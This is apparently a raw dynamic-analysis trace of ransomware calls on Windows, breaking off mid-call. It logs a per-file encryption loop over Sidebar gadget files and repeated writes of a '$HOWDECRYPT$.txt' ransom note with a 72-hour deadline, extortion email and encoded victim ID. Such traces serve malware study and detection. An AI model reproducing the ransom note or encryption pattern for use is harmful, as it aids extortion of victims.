RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8a0*=0x30) returned 1 [0161.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.280] GetProcessHeap () returned 0x2c0000 [0161.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.280] GetProcessHeap () returned 0x2c0000 [0161.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b5e0 | out: hHeap=0x2c0000) returned 1 [0161.280] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8a8 | out: pbBuffer=0x57e8a8) returned 1 [0161.280] GetProcessHeap () returned 0x2c0000 [0161.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.280] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8a0*=0x30) returned 1 [0161.280] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.292] GetProcessHeap () returned 0x2c0000 [0161.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.292] GetProcessHeap () returned 0x2c0000 [0161.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b200 | out: hHeap=0x2c0000) returned 1 [0161.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.392] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.392] WriteFile (in: hFile=0x178, lpBuffer=0x57e7d7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e900, lpOverlapped=0x0 | out: lpBuffer=0x57e7d7*, lpNumberOfBytesWritten=0x57e900*=0x127, lpOverlapped=0x0) returned 1 [0161.393] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.393] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e900, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e900*=0x2ac, lpOverlapped=0x0) returned 1 [0161.393] CloseHandle (hObject=0x178) returned 1 [0161.393] GetProcessHeap () returned 0x2c0000 [0161.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a678 | out: hHeap=0x2c0000) returned 1 [0161.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8a0 | out: pbBuffer=0x57e8a0) returned 1 [0161.393] GetProcessHeap () returned 0x2c0000 [0161.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e898*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e898*=0x30) returned 1 [0161.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\row_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.395] GetProcessHeap () returned 0x2c0000 [0161.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.395] GetProcessHeap () returned 0x2c0000 [0161.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87fd0 | out: hHeap=0x2c0000) returned 1 [0161.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e898 | out: pbBuffer=0x57e898) returned 1 [0161.395] GetProcessHeap () returned 0x2c0000 [0161.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e890*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e890*=0x30) returned 1 [0161.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.396] GetProcessHeap () returned 0x2c0000 [0161.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.396] GetProcessHeap () returned 0x2c0000 [0161.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87ed8 | out: hHeap=0x2c0000) returned 1 [0161.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e898 | out: pbBuffer=0x57e898) returned 1 [0161.396] GetProcessHeap () returned 0x2c0000 [0161.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e890*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e890*=0x30) returned 1 [0161.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.397] GetProcessHeap () returned 0x2c0000 [0161.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.397] GetProcessHeap () returned 0x2c0000 [0161.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb02b8 | out: hHeap=0x2c0000) returned 1 [0161.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e890 | out: pbBuffer=0x57e890) returned 1 [0161.397] GetProcessHeap () returned 0x2c0000 [0161.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e888*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e888*=0x30) returned 1 [0161.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.398] GetProcessHeap () returned 0x2c0000 [0161.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.399] GetProcessHeap () returned 0x2c0000 [0161.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87de0 | out: hHeap=0x2c0000) returned 1 [0161.399] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e890 | out: pbBuffer=0x57e890) returned 1 [0161.399] GetProcessHeap () returned 0x2c0000 [0161.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e888*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e888*=0x30) returned 1 [0161.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.399] GetProcessHeap () returned 0x2c0000 [0161.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.399] GetProcessHeap () returned 0x2c0000 [0161.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb00b8 | out: hHeap=0x2c0000) returned 1 [0161.399] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e888 | out: pbBuffer=0x57e888) returned 1 [0161.399] GetProcessHeap () returned 0x2c0000 [0161.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e880*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e880*=0x30) returned 1 [0161.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.405] GetProcessHeap () returned 0x2c0000 [0161.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.405] GetProcessHeap () returned 0x2c0000 [0161.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaffb8 | out: hHeap=0x2c0000) returned 1 [0161.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e888 | out: pbBuffer=0x57e888) returned 1 [0161.405] GetProcessHeap () returned 0x2c0000 [0161.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e880*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e880*=0x30) returned 1 [0161.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.411] GetProcessHeap () returned 0x2c0000 [0161.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.411] GetProcessHeap () returned 0x2c0000 [0161.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c88c18 | out: hHeap=0x2c0000) returned 1 [0161.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e880 | out: pbBuffer=0x57e880) returned 1 [0161.411] GetProcessHeap () returned 0x2c0000 [0161.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e878*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e878*=0x30) returned 1 [0161.411] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.412] GetProcessHeap () returned 0x2c0000 [0161.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.412] GetProcessHeap () returned 0x2c0000 [0161.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c88a08 | out: hHeap=0x2c0000) returned 1 [0161.413] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e880 | out: pbBuffer=0x57e880) returned 1 [0161.413] GetProcessHeap () returned 0x2c0000 [0161.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.413] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e878*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e878*=0x30) returned 1 [0161.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.413] GetProcessHeap () returned 0x2c0000 [0161.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.413] GetProcessHeap () returned 0x2c0000 [0161.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eafeb8 | out: hHeap=0x2c0000) returned 1 [0161.413] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e878 | out: pbBuffer=0x57e878) returned 1 [0161.413] GetProcessHeap () returned 0x2c0000 [0161.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.413] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e870*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e870*=0x30) returned 1 [0161.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.414] GetProcessHeap () returned 0x2c0000 [0161.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.414] GetProcessHeap () returned 0x2c0000 [0161.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87ce8 | out: hHeap=0x2c0000) returned 1 [0161.414] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e878 | out: pbBuffer=0x57e878) returned 1 [0161.414] GetProcessHeap () returned 0x2c0000 [0161.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.414] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e870*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e870*=0x30) returned 1 [0161.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.415] GetProcessHeap () returned 0x2c0000 [0161.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.415] GetProcessHeap () returned 0x2c0000 [0161.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87bf0 | out: hHeap=0x2c0000) returned 1 [0161.415] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e870 | out: pbBuffer=0x57e870) returned 1 [0161.415] GetProcessHeap () returned 0x2c0000 [0161.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.416] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e868*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e868*=0x30) returned 1 [0161.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.417] GetProcessHeap () returned 0x2c0000 [0161.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.417] GetProcessHeap () returned 0x2c0000 [0161.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eafdb8 | out: hHeap=0x2c0000) returned 1 [0161.417] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e870 | out: pbBuffer=0x57e870) returned 1 [0161.417] GetProcessHeap () returned 0x2c0000 [0161.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.417] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e868*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e868*=0x30) returned 1 [0161.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.417] GetProcessHeap () returned 0x2c0000 [0161.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.417] GetProcessHeap () returned 0x2c0000 [0161.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2a98 | out: hHeap=0x2c0000) returned 1 [0161.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.419] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.419] WriteFile (in: hFile=0x178, lpBuffer=0x57e79f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e8c8, lpOverlapped=0x0 | out: lpBuffer=0x57e79f*, lpNumberOfBytesWritten=0x57e8c8*=0x127, lpOverlapped=0x0) returned 1 [0161.420] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.420] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e8c8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e8c8*=0x2ac, lpOverlapped=0x0) returned 1 [0161.420] CloseHandle (hObject=0x178) returned 1 [0161.420] GetProcessHeap () returned 0x2c0000 [0161.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae1b8 | out: hHeap=0x2c0000) returned 1 [0161.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.454] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.454] WriteFile (in: hFile=0x178, lpBuffer=0x57e79b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e8c4, lpOverlapped=0x0 | out: lpBuffer=0x57e79b*, lpNumberOfBytesWritten=0x57e8c4*=0x127, lpOverlapped=0x0) returned 1 [0161.455] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.455] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e8c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e8c4*=0x2ac, lpOverlapped=0x0) returned 1 [0161.455] CloseHandle (hObject=0x178) returned 1 [0161.455] GetProcessHeap () returned 0x2c0000 [0161.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c88900 | out: hHeap=0x2c0000) returned 1 [0161.455] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e860 | out: pbBuffer=0x57e860) returned 1 [0161.455] GetProcessHeap () returned 0x2c0000 [0161.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.456] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, 